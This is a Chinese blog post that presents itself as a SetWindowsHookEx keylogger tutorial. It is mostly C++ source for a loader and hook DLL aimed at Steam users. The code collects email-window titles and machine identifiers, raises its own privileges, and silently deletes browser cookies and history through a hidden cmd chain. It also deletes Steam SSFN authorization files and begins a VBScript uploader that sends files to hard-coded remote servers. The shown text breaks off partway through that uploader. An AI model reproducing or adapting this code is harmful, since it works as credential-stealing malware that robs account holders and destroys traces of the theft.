SetWindowsHookEx: 全局钩子实现键盘记录器

 

简介

        SetWindowsHookEx 钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。

        钩子实际上是一个处理消息的程序段,通过系统调用,把它挂入系统。每当特定的消息发出,在没有到达目的窗口前,钩子程序就先捕获该消息,亦即钩子函数先得到控制权。这时钩子函数即可以加工处理(改变)该消息,也可以不作处理而继续传递该消息,还可以强制结束消息的传递。在窗口消息的处理流程插队加入自己的处理函数。

        在Ring3级下,SetWindowsHookEx 这个函数能够实现优先拦截提交给特定窗口的信息,并进行拦截者需要的处理,然后再提交给窗口函数或是下一个钩子函数,函数第一个参数为idHook,需要设置钩子的类型,在以下代码样例中我们选择安装的钩子类型为WH_GETMESSAGE,用来拦截WM_KEYDOWN键盘信息。

函数原型:

SetWindowsHookEx(//钩子类型_In_ int idHook,//回调函数地址_In_ HOOKPROC lpfn,//实例句柄(包含有钩子函数)_In_opt_ HINSTANCE hmod,//线程ID,欲勾住的线程(为0则不指定,全局)_In_ DWORD dwThreadId);

设置Hook类型如下: 

宏值含义
WH_MSGFILTER截获用户与控件交互的消息
WH_KEYBOARD截获键盘消息
WH_GETMESSAGE截获从消息队列送出的消息
WH_CBT截获系统基本消息,激活,建立,销毁,最小化,最大化,移动,改变尺寸等窗口事件
WH_MOUSE截获鼠标消息
WH_CALLWNDPROCRET截获目标窗口处理完毕的消息

返回值:

若此函数执行成功,则返回值就是该挂钩处理过程的句柄;若此函数执行失败,则返回值为NULL(0)。若想获得更多错误信息,请调用GetLastError函数。


实现代码

以下是部分实现代码,忘了是啥年代写的,没啥技术含量,大佬可以忽略。 

主程序:

// Steam.cpp : Defines the entry point for the application.
/#include "stdafx.h"// 函数声明LRESULT CALLBACK    WndProc(HWND, UINT, WPARAM, LPARAM);// 程序入口点int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR     lpCmdLine,int       nCmdShow)
{// TODO: Place code here.//加密标识CString Error = "****** 2019.04.07";MSG msg;HWND hWnd;char szTitle[]="Rainbow";                                // The title bar textchar szWindowClass[]="RBTools";                                // The title bar textWNDCLASSEX wcex={0};wcex.cbSize = sizeof(WNDCLASSEX);        //WNDCLASSEX结构体大小wcex.style            = CS_HREDRAW | CS_VREDRAW;    //位置改变时重绘wcex.lpfnWndProc    = (WNDPROC)WndProc;            //消息处理函数wcex.hInstance        = 0;            //当前实例句柄wcex.hbrBackground    = (HBRUSH)COLOR_WINDOWFRAME;    //背景色wcex.lpszClassName    = szWindowClass;        //参窗口类名wcex.hIcon            =0;        //图标wcex.hCursor        =0;        //光标wcex.lpszMenuName    =0;        //菜单名称wcex.hIconSm        =0;        //最小化图标RegisterClassEx(&wcex);            //注册窗口类hWnd = CreateWindow(szWindowClass, szTitle, WS_DISABLED,    //创建窗口CW_USEDEFAULT,CW_USEDEFAULT, 1, 1, NULL, NULL, 0, NULL);if (!hWnd){return FALSE;}ShowWindow(hWnd, 0);UpdateWindow(hWnd);char szDllPath1[MAX_PATH] = { 0 };GetSystemDirectory(szDllPath1, sizeof(szDllPath1));strcpy(szDllPath1+2, "\\Program Files\\Common Files\\rundll32.dll");static HINSTANCE hinstDLL1;typedef void (CALLBACK *inshook1)();//定义回调函数的地址 inshook1 instkbhook1;if(hinstDLL1=LoadLibrary((LPCTSTR)szDllPath1)){instkbhook1=(inshook1)GetProcAddress(hinstDLL1, "installhook"); instkbhook1();}while (GetMessage(&msg, NULL, 0, 0))     // 消息循环:{TranslateMessage(&msg);        //转化虚拟按键到字符消息DispatchMessage(&msg);        //分派消息调用回调函数}return msg.wParam;
}LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{switch (message) {case WM_DESTROY:    //窗口销毁消息PostQuitMessage(0);break;default:return DefWindowProc(hWnd, message, wParam, lParam);}return 0;
}

 HOOK DLL:

// test3.cpp : Defines the initialization routines for the DLL.
//#include "stdafx.h"
#include "test3.h"#define  DllExport _declspec(dllexport)#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif#define SWEEP_BUFFER_SIZE 10000//合并区段
//#pragma comment(linker, "/MERGE:.rdata=.data")
//#pragma comment(linker, "/MERGE:.text=.data")
//#pragma comment(linker, "/MERGE:.reloc=.data")//共享区段
#pragma data_seg(".SHARDAT")#pragma data_seg()//设置区段属性
#pragma comment(linker, "/section:.SHARDAT,RWE")//
//								用户数据													////// 到期时间														//CString UserEndData = "2019.05.04";								////
//
//								配置数据// 用户 IDCString strUserID = "002";// 程序版本CString szVersion = "20190407_3";// 统计接口CString strServerName = "http://login.37wan.com/";// 邮箱 & 上传接口CString strMailServerName = "http://upload.37wan.com/";//char osx[MAX_PATH]={0};
char jsj[MAX_PATH]={0};CString szLocalLP = "";
CString szAccount = "";
CString myEmailSTR = "";
CString szMyselfPath = "";
CString szStr = "", szStr2 = "";
CString szMailID, szMailName, szMailAddr;
CString szRegExe, szSTPath, szSTFile, szOneUser, szRegUser, szRegUser2, szStrFirst, szStrSecon; BOOL Login = false;
BOOL Regedit = false;
BOOL szBrowser = false;
BOOL szIERegedit = false;
BOOL szEMailName = false;
BOOL szTslgameEXE = false;HWND hcaretWnd = NULL;
static HANDLE thread = NULL;HINSTANCE hins = NULL;
static HHOOK hkb = NULL;HINSTANCE hinss = NULL;
static HHOOK hie = NULL;static char TAB_BASE64[]={"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"};//
//	Note!
//
//		If this DLL is dynamically linked against the MFC
//		DLLs, any functions exported from this DLL which
//		call into MFC must have the AFX_MANAGE_STATE macro
//		added at the very beginning of the function.
//
//		For example:
//
//		extern "C" BOOL PASCAL EXPORT ExportedFunction()
//		{
//			AFX_MANAGE_STATE(AfxGetStaticModuleState());
//			// normal function body here
//		}
//
//		It is very important that this macro appear in each
//		function, prior to any calls into MFC.  This means that
//		it must appear as the first statement within the 
//		function, even before any object variable declarations
//		as their constructors may generate calls into the MFC
//		DLL.
//
//		Please see MFC Technical Notes 33 and 58 for additional
//		details.
///
// CTest3AppBEGIN_MESSAGE_MAP(CTest3App, CWinApp)//{{AFX_MSG_MAP(CTest3App)// NOTE - the ClassWizard will add and remove mapping macros here.//    DO NOT EDIT what you see in these blocks of generated code!//}}AFX_MSG_MAP
END_MESSAGE_MAP()// 提升程序系统权限BOOL DllExport AdjustPrivileges()
{HANDLE hToken = NULL;TOKEN_PRIVILEGES tp = {0};TOKEN_PRIVILEGES oldtp = {0};DWORD dwSize = sizeof(TOKEN_PRIVILEGES);LUID luid = {0};if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {if (GetLastError()==ERROR_CALL_NOT_IMPLEMENTED)return TRUE;elsereturn FALSE;}if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) {CloseHandle(hToken);return FALSE;}tp.PrivilegeCount=1;tp.Privileges[0].Luid = luid;tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;/* Adjust Token Privileges */if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), &oldtp, &dwSize)) {CloseHandle(hToken);return FALSE;}// close handlesCloseHandle(hToken);return TRUE;
}// 设置当前进程优先级为最高(实时)BOOL DllExport SetRealTimePriority()
{if ( !SetPriorityClass( GetCurrentProcess(), REALTIME_PRIORITY_CLASS ) ){return FALSE;}return TRUE;
}// 数据加密int DllExport tranasci(char a)
{return (a-'A'+65);
}CString DllExport gen(CString m_url)
{int i=0;int l=0;int k=0;CString curl;l=m_url.GetLength();for(i;i<l;i+=2){char		temp1=m_url.GetAt( i );char		temp2=m_url.GetAt(i+1);if(temp2==NULL){int			ansi1=tranasci(temp1);CString		str1;str1.Format("%X",ansi1);str1.Replace("FFFFFF", "");//curl+="%";curl+=str1;break;}int			ansi1=tranasci(temp1);int			ansi2=tranasci(temp2);CString		str1;CString		str2;str1.Format("%X",ansi1);str2.Format("%X",ansi2);str1.Replace("FFFFFF", "");str2.Replace("FFFFFF", "");//curl+="%";curl+=str1;//curl+="%";curl+=str2;}if (l%2){}else{
//		curl+="%";}return curl;
}CString DllExport BASE64Encode(CString strIn, long Len)   
{   CString strOut,strTemp;   BYTE chr[3];   char chrBs[5];   long lTemp,lTemp2;   chrBs[4]='\0';   strOut="";   if(Len<1)   {   return strOut;   }   for (lTemp=0;lTemp<Len/3;lTemp++)   {   lTemp2=lTemp*3;   chr[0]=(BYTE)strIn.GetAt(lTemp2);   chr[1]=(BYTE)strIn.GetAt(lTemp2+1);   chr[2]=(BYTE)strIn.GetAt(lTemp2+2);   chrBs[0]=(chr[0]>>2)&0x3F;   chrBs[1]=((chr[0]<<4)|(chr[1]>>4))&0x3F;   chrBs[2]=((chr[1]<<2)|(chr[2]>>6))&0x3F;   chrBs[3]=chr[2]&0x3F;   chrBs[0]=TAB_BASE64[chrBs[0]];   chrBs[1]=TAB_BASE64[chrBs[1]];   chrBs[2]=TAB_BASE64[chrBs[2]];   chrBs[3]=TAB_BASE64[chrBs[3]];   strOut+=chrBs;   }   if (1==Len%3)   {   chr[0]=(BYTE)strIn.GetAt(Len-1);   chrBs[0]=(chr[0]>>2)&0x3F;   chrBs[1]=(chr[0]<<4)&0x3F;   chrBs[0]=TAB_BASE64[chrBs[0]];   chrBs[1]=TAB_BASE64[chrBs[1]];   chrBs[2]='=';   chrBs[3]='=';   strOut+=chrBs;   }   else if (2==Len%3)   {   chr[0]=(BYTE)strIn.GetAt(Len-2);   chr[1]=(BYTE)strIn.GetAt(Len-1);   chrBs[0]=(chr[0]>>2)&0x3F;   chrBs[1]=((chr[0]<<4)|(chr[1]>>4))&0x3F;   chrBs[2]=(chr[1]<<2)&0x3F;   chrBs[0]=TAB_BASE64[chrBs[0]];   chrBs[1]=TAB_BASE64[chrBs[1]];   chrBs[2]=TAB_BASE64[chrBs[2]];   chrBs[3]='=';   strOut+=chrBs;   }   return strOut;   
} // 获取随机名称CString DllExport GetName()
{CString mySTR1 = "", mySTR2 = "";time_t seed = time(NULL); srand((unsigned)seed);for(int j=0; j<6 ;j++){int randNum = rand()%26;//取一个随机数,该数字为0-25if(j%2){mySTR1.Format("%C", randNum+97);//随机数为0到25,而小写字母的asc码为97到122,所以加97}else{mySTR1.Format("%C", randNum+65);//随机数为0到25,而大写字母的asc码为65到90,所以加65}mySTR2 += mySTR1;Sleep(100);//sleep一下,使随机因子取的分散些}return mySTR2;
}// 结束进程BOOL DllExport KillProcess(CString szProcess)
{BOOL szKill = FALSE;PROCESSENTRY32 pe32;pe32.dwSize =sizeof(pe32);HANDLE hpro=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);if(hpro==INVALID_HANDLE_VALUE){  return szKill;}szProcess.MakeLower();BOOL nowrun=Process32First(hpro,&pe32);while(nowrun){CString szGetProcess;szGetProcess = pe32.szExeFile;szGetProcess.MakeLower();if(szGetProcess == szProcess){DWORD proid=pe32.th32ProcessID;HANDLE hprocess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,proid);if(hprocess!=NULL){::TerminateProcess(hprocess,0);szKill = TRUE;}::CloseHandle(hprocess);}nowrun=::Process32Next(hpro,&pe32);}::CloseHandle(hpro);return szKill;
}// 获取 steam.exe 进程标识DWORD DllExport GetEXE()
{HANDLE m_handle=::CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);PROCESSENTRY32* Info = new PROCESSENTRY32;Info->dwSize = sizeof(PROCESSENTRY32);if(::Process32First(m_handle,Info)){while(::Process32Next(m_handle,Info)!=FALSE){CString ss;ss=Info->szExeFile;ss.MakeLower();if(ss.Find("steam.exe") != -1){return Info->th32ProcessID;}}::CloseHandle(m_handle);if(Info){delete Info;}}return -1;
}// 查找进程BOOL DllExport GetProcess(CString TargetName) 
{ CString fileName(TargetName);fileName.MakeLower(); //转为小写 HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);  // 创建快照句柄 PROCESSENTRY32 pe32x = {sizeof(PROCESSENTRY32),0};//定义一个PROCESSENTRY32结类型的变量 if( Process32First(hShot,&pe32x) ) {do{CString process_fileName = pe32x.szExeFile;process_fileName.MakeLower();//进程文件名转换为小写if( fileName == process_fileName ){CloseHandle(hShot);return TRUE;}}while( Process32Next(hShot, &pe32x) );} CloseHandle(hShot);return FALSE;
}// 枚举顶层窗口获取标题BOOL DllExport CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam)
{if( GetParent(hWnd)==NULL && IsWindowVisible(hWnd) ){TCHAR sTitle[MAX_PATH]={0};ZeroMemory(sTitle, MAX_PATH * sizeof(TCHAR));GetWindowText(hWnd, sTitle, sizeof(sTitle));//SendMessage(hWnd, WM_GETTEXT, (WPARAM)MAX_PATH, (LPARAM)sTitle);//AfxMessageBox(sTitle);CString szMainName = "";szMainName.Format(TEXT("%s"), sTitle);int MAIL0 = szMainName.Find("邮箱大全", 0);char *MAIL1;MAIL1 = strstr(sTitle, "邮箱");char *MAIL2;MAIL2 = strstr(sTitle, "电子邮");char *MAIL3;MAIL3 = strstr(sTitle, "免费邮");char *MAIL4;MAIL4 = strstr(sTitle, "电子邮件");char *MAIL5;MAIL5 = strstr(sTitle, "手机统一");char *MAIL6;MAIL6 = strstr(sTitle, "Microsoft 帐户");char *MAIL7;MAIL7 = strstr(sTitle, "Yahoo -");if( MAIL0 == -1 && (MAIL1 || MAIL2 || MAIL3 || MAIL4 || MAIL5 || MAIL6 || MAIL7) ){HWND Hwnd_Browser = ::GetForegroundWindow();if(hWnd == Hwnd_Browser){if(!szEMailName){CString szACCID;szACCID.Format(TEXT("C:\\MailName.txt"));szMailName.Format(TEXT("%s"), sTitle);FILE *fps1;fps1=fopen(szACCID, "w");if(fps1){fprintf(fps1, "%s", szMailName.GetBuffer(0));}fclose(fps1);szEMailName = true;}//AfxMessageBox(szMailName);return FALSE;}}}return TRUE;
}// 获取 MACtypedef struct _ASTAT_ 
{ ADAPTER_STATUS adapt; NAME_BUFFER    NameBuff[30]; 
}ASTAT, * PASTAT;UCHAR DllExport GetAddressByIndex(int lana_num,ASTAT & Adapter)
{UCHAR uRetCode; //-------------------------------------------------------------------NCB ncb; memset(&ncb, 0, sizeof(ncb) ); ncb.ncb_command = NCBRESET; ncb.ncb_lana_num = lana_num; //指定网卡号,首先对选定的网卡发送一个NCBRESET命令,以便进行初始化 uRetCode = Netbios(&ncb ); memset(&ncb, 0, sizeof(ncb) ); ncb.ncb_command = NCBASTAT; ncb.ncb_lana_num = lana_num;//指定网卡号 strcpy((char *)ncb.ncb_callname,"*      " ); ncb.ncb_buffer = (unsigned char *)&Adapter; //指定返回的信息存放的变量 ncb.ncb_length = sizeof(Adapter); //接着,可以发送NCBASTAT命令以获取网卡的信息 uRetCode = Netbios(&ncb ); //-------------------------------------------------------------------return uRetCode;
}CString DllExport GetMacAddress(void)
{CString strMacAddress;//-------------------------------------------------------------------NCB ncb; UCHAR uRetCode;int num = 0;LANA_ENUM lana_enum; memset(&ncb, 0, sizeof(ncb) ); ncb.ncb_command = NCBENUM; ncb.ncb_buffer = (unsigned char *)&lana_enum; ncb.ncb_length = sizeof(lana_enum); //向网卡发送NCBENUM命令,以获取当前机器的网卡信息,如有多少个网卡//每张网卡的编号等 uRetCode = Netbios(&ncb);if (uRetCode == 0) {num = lana_enum.length;//对每一张网卡,以其网卡编号为输入编号,获取其MAC地址 for (int i = 0; i < num; i++){ASTAT Adapter;if(GetAddressByIndex(lana_enum.lana[i],Adapter) == 0){strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"), Adapter.adapt.adapter_address[0], Adapter.adapt.adapter_address[1], Adapter.adapt.adapter_address[2], Adapter.adapt.adapter_address[3], Adapter.adapt.adapter_address[4], Adapter.adapt.adapter_address[5]);}}}//-------------------------------------------------------------------return strMacAddress;
}// 获取 IE 版本CString DllExport GetIEVerSion()
{HKEY   hKEY;CString myIEVersion = "";LPCTSTR   data_Set = "SOFTWARE\\Microsoft\\Internet Explorer";long   ret0=(RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY)); if(ret0 == ERROR_SUCCESS){LPBYTE owner_Get1=new BYTE[80];DWORD type_1=REG_SZ;DWORD cbData_1=80;long   ret1=::RegQueryValueEx(hKEY, "svcVersion", NULL, &type_1, owner_Get1, &cbData_1);   if(ret1 == ERROR_SUCCESS)   {   char *IEVersion = (char *)owner_Get1;myIEVersion.Format(TEXT("%s"), IEVersion);}else{LPBYTE owner_Get2=new BYTE[80];DWORD type_2=REG_SZ;DWORD cbData_2=80;long   ret2=::RegQueryValueEx(hKEY, "Version", NULL, &type_2, owner_Get2, &cbData_2);if(ret2 == ERROR_SUCCESS)   {   char *IEVersion = (char *)owner_Get2;myIEVersion.Format(TEXT("%s"), IEVersion);}}}RegCloseKey(hKEY);return myIEVersion;
}// 获取系统位数BOOL DllExport IsWow64()
{typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);LPFN_ISWOW64PROCESS fnIsWow64Process;BOOL bIsWow64 = FALSE;fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress( GetModuleHandle("kernel32"),"IsWow64Process");if (NULL != fnIsWow64Process){fnIsWow64Process(GetCurrentProcess(),&bIsWow64);}return bIsWow64;
}// 获取系统版本void DllExport os()
{//先判断是否为 win8.1 或 win10typedef void(__stdcall*NTPROC)(DWORD*, DWORD*, DWORD*);HINSTANCE hinst = LoadLibrary("ntdll.dll");DWORD dwMajor, dwMinor, dwBuildNumber;NTPROC proc = (NTPROC)GetProcAddress(hinst, "RtlGetNtVersionNumbers"); proc(&dwMajor, &dwMinor, &dwBuildNumber); if (dwMajor == 6 && dwMinor == 3)	//win 8.1{strcat(osx, "Win 8.1");}else if (dwMajor == 10 && dwMinor == 0)	//win 10{strcat(osx, "Win 10");}else{//判断win8.1以下的版本SYSTEM_INFO info;                //用SYSTEM_INFO结构判断64位AMD处理器  GetSystemInfo(&info);            //调用GetSystemInfo函数填充结构  OSVERSIONINFOEX os;os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);#pragma warning(disable:4996)if (GetVersionEx((OSVERSIONINFO *)&os)){//下面根据版本信息判断操作系统名称  switch (os.dwMajorVersion){case 5:switch (os.dwMinorVersion){case 0:strcat(osx, "Win 2000");break;case 1:strcat(osx, "Win XP");break;case 2:if (os.wProductType == VER_NT_WORKSTATION &&info.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64)strcat(osx, "Win XP Professional x64 Edition");elsestrcat(osx, "Win Server 2003");break;}break;case 6:switch (os.dwMinorVersion){case 0:if (os.wProductType == VER_NT_WORKSTATION)strcat(osx, "Win Vista");elsestrcat(osx, "Win Server 2008");break;case 1:if (os.wProductType == VER_NT_WORKSTATION)strcat(osx, "Win 7");elsestrcat(osx, "Win Server 2008 R2");break;case 2:if (os.wProductType == VER_NT_WORKSTATION)strcat(osx, "Win 8");elsestrcat(osx, "Win Server 2012");break;}break;default:strcat(osx, "Unkonw OS");}}elsestrcat(osx, "Unkonw OS");}if(IsWow64()){strcat(osx, " x64");}else{strcat(osx, " x86");}
}// 清理缓存文件enum DEL_CACHE_TYPE //要删除的类型。
{File,//表示internet临时文件Cookie //表示Cookie
};BOOL DllExport DeleteUrlCache(DEL_CACHE_TYPE type)
{BOOL bRet = FALSE;HANDLE hEntry;LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;  DWORD dwEntrySize;//delete the filesdwEntrySize = 0;hEntry = FindFirstUrlCacheEntry(NULL, NULL, &dwEntrySize);lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];hEntry = FindFirstUrlCacheEntry(NULL, lpCacheEntry, &dwEntrySize);if (!hEntry){goto cleanup;}do{if (type == File &&!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY)){DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);}else if (type == Cookie &&(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY)){DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);}dwEntrySize = 0;FindNextUrlCacheEntry(hEntry, NULL, &dwEntrySize);delete [] lpCacheEntry; lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];}while (FindNextUrlCacheEntry(hEntry, lpCacheEntry, &dwEntrySize));bRet = TRUE;
cleanup:if (lpCacheEntry){delete [] lpCacheEntry; }return bRet;
}BOOL DllExport WipeFile(LPCTSTR szDir, LPCTSTR szFile)
{CString sPath;HANDLE	hFile;DWORD	dwSize;DWORD	dwWrite;char	sZero[SWEEP_BUFFER_SIZE];memset(sZero, 0, SWEEP_BUFFER_SIZE);sPath = szDir;sPath += _T('\\');sPath += szFile;hFile = CreateFile(sPath, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);if (hFile == INVALID_HANDLE_VALUE){return FALSE;}dwSize = GetFileSize(hFile, NULL);//skip file header (actually, I don't know the file format of index.dat)dwSize -= 64;SetFilePointer(hFile, 64, NULL, FILE_BEGIN);while (dwSize > 0){if (dwSize > SWEEP_BUFFER_SIZE){WriteFile(hFile, sZero, SWEEP_BUFFER_SIZE, &dwWrite, NULL);dwSize -= SWEEP_BUFFER_SIZE;}else{WriteFile(hFile, sZero, dwSize, &dwWrite, NULL);break;}}CloseHandle(hFile);return TRUE;
}BOOL DllExport EmptyDirectory(LPCTSTR szPath, BOOL bDeleteDesktopIni, BOOL bWipeIndexDat)
{WIN32_FIND_DATA wfd;HANDLE hFind;CString sFullPath;CString sFindFilter;DWORD dwAttributes = 0;sFindFilter = szPath;sFindFilter += _T("\\*.*");if ((hFind = FindFirstFile(sFindFilter, &wfd)) == INVALID_HANDLE_VALUE){return FALSE;}do{if (_tcscmp(wfd.cFileName, _T(".")) == 0 || _tcscmp(wfd.cFileName, _T("..")) == 0 ||(bDeleteDesktopIni == FALSE && _tcsicmp(wfd.cFileName, _T("desktop.ini")) == 0)){continue;}sFullPath = szPath;sFullPath += _T('\\');sFullPath += wfd.cFileName;//去掉只读属性dwAttributes = GetFileAttributes(sFullPath);if (dwAttributes & FILE_ATTRIBUTE_READONLY){dwAttributes &= ~FILE_ATTRIBUTE_READONLY;SetFileAttributes(sFullPath, dwAttributes);}if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY){EmptyDirectory(sFullPath, bDeleteDesktopIni, bWipeIndexDat);RemoveDirectory(sFullPath);}else{if (bWipeIndexDat && _tcsicmp(wfd.cFileName, _T("index.dat")) == 0){WipeFile(szPath, wfd.cFileName);}DeleteFile(sFullPath);}}while (FindNextFile(hFind, &wfd));FindClose(hFind);return TRUE;
}BOOL DllExport DelTempFiles()
{// 清理DNS缓存ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);// 清理 缓存 与 CookiesTCHAR szPath[MAX_PATH];DeleteUrlCache(Cookie);if (SHGetSpecialFolderPath(NULL, szPath, CSIDL_COOKIES, FALSE)){EmptyDirectory(szPath, 1, 1);}CString myCleaner = TEXT(" /c del /f /s /q \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\Microsoft\\Windows\\History\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*.*\" && del /f /s /q \"%userprofile%\\Local Settings\\History\\*.*\" && del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\CookiesV3\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\History\" && exit");//AfxMessageBox(myCleaner);ShellExecute(NULL, "open", "cmd.exe", myCleaner, "", SW_HIDE);BOOL bResult = FALSE;BOOL bDone = FALSE;LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;DWORD  dwTrySize, dwEntrySize = 4096; // start buffer sizeHANDLE hCacheDir = NULL;DWORD  dwError = ERROR_INSUFFICIENT_BUFFER;do{switch (dwError){// need a bigger buffercase ERROR_INSUFFICIENT_BUFFER:delete [] lpCacheEntry;lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];lpCacheEntry->dwStructSize = dwEntrySize;dwTrySize = dwEntrySize;BOOL bSuccess;if (hCacheDir == NULL)bSuccess = (hCacheDir= FindFirstUrlCacheEntry(NULL, lpCacheEntry,&dwTrySize)) != NULL;elsebSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);if (bSuccess)dwError = ERROR_SUCCESS;else{dwError = GetLastError();dwEntrySize = dwTrySize; // use new size returned}break;// we are donecase ERROR_NO_MORE_ITEMS:bDone = TRUE;bResult = TRUE;break;// we have got an entrycase ERROR_SUCCESS:// don't delete cookie entryif (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);// get ready for next entrydwTrySize = dwEntrySize;if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))dwError = ERROR_SUCCESS;else{dwError = GetLastError();dwEntrySize = dwTrySize; // use new size returned}break;// unknown errordefault:bDone = TRUE;break;}if (bDone){delete []lpCacheEntry;if (hCacheDir)FindCloseUrlCache(hCacheDir);}} while (!bDone);return TRUE;
}// 删除授权文件模块BOOL DllExport SearchFilesByWildcard_1(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{HANDLE hFile = INVALID_HANDLE_VALUE;WIN32_FIND_DATA pNextInfo;CString mySSFNFiles = "";hFile = FindFirstFile(wildcardPathandFile, &pNextInfo);if(INVALID_HANDLE_VALUE == hFile){return FALSE;}if(pNextInfo.cFileName[0] != '.'){mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);DeleteFile(mySSFNFiles);}while(FindNextFile(hFile, &pNextInfo)){if(pNextInfo.cFileName[0] == '.'){continue;}mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);DeleteFile(mySSFNFiles);}return FALSE;
}// 上传 并 删除 授权文件模块BOOL DllExport SearchFilesByWildcard_2(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{HANDLE hFile = INVALID_HANDLE_VALUE;WIN32_FIND_DATA pNextInfo;CString myLP;CString myVBSFilePath;CString mySSFNFiles = "", myTXTSSFNFiles = "", mySSFNFilesName = "";myLP = szLocalLP;CString myUploadVBS = "";myUploadVBS += "Class XMLUpload \r\n";myUploadVBS += "Private xmlHttp \r\n";myUploadVBS += "Private objTemp \r\n";myUploadVBS += "Private adTypeBinary, adTypeText \r\n";myUploadVBS += "Private strCharset, strBoundary \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Sub Class_Initialize() \r\n";myUploadVBS += "adTypeBinary = 1 \r\n";myUploadVBS += "adTypeText = 2 \r\n";myUploadVBS += "Set xmlHttp = CreateObject(\"Msxml2.XMLHTTP\") \r\n";myUploadVBS += "Set objTemp = CreateObject(\"ADODB.Stream\") \r\n";myUploadVBS += "objTemp.Type = adTypeBinary \r\n";myUploadVBS += "objTemp.Open \r\n";myUploadVBS += "strCharset = \"utf-8\" \r\n";myUploadVBS += "strBoundary = GetBoundary() \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Sub Class_Terminate() \r\n";myUploadVBS += "objTemp.Close \r\n";myUploadVBS += "Set objTemp = Nothing \r\n";myUploadVBS += "Set xmlHttp = Nothing \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Function StringToBytes(ByVal strData, ByVal strCharset) \r\n";myUploadVBS += "Dim objFile \r\n";myUploadVBS += "Set objFile = CreateObject(\"ADODB.Stream\") \r\n";myUploadVBS += "objFile.Type = adTypeText \r\n";myUploadVBS += "objFile.Charset = strCharset \r\n";myUploadVBS += "objFile.Open \r\n";myUploadVBS += "objFile.WriteText strData \r\n";myUploadVBS += "objFile.Position = 0 \r\n";myUploadVBS += "objFile.Type = adTypeBinary \r\n";myUploadVBS += "If UCase(strCharset) = \"UNICODE\" Then 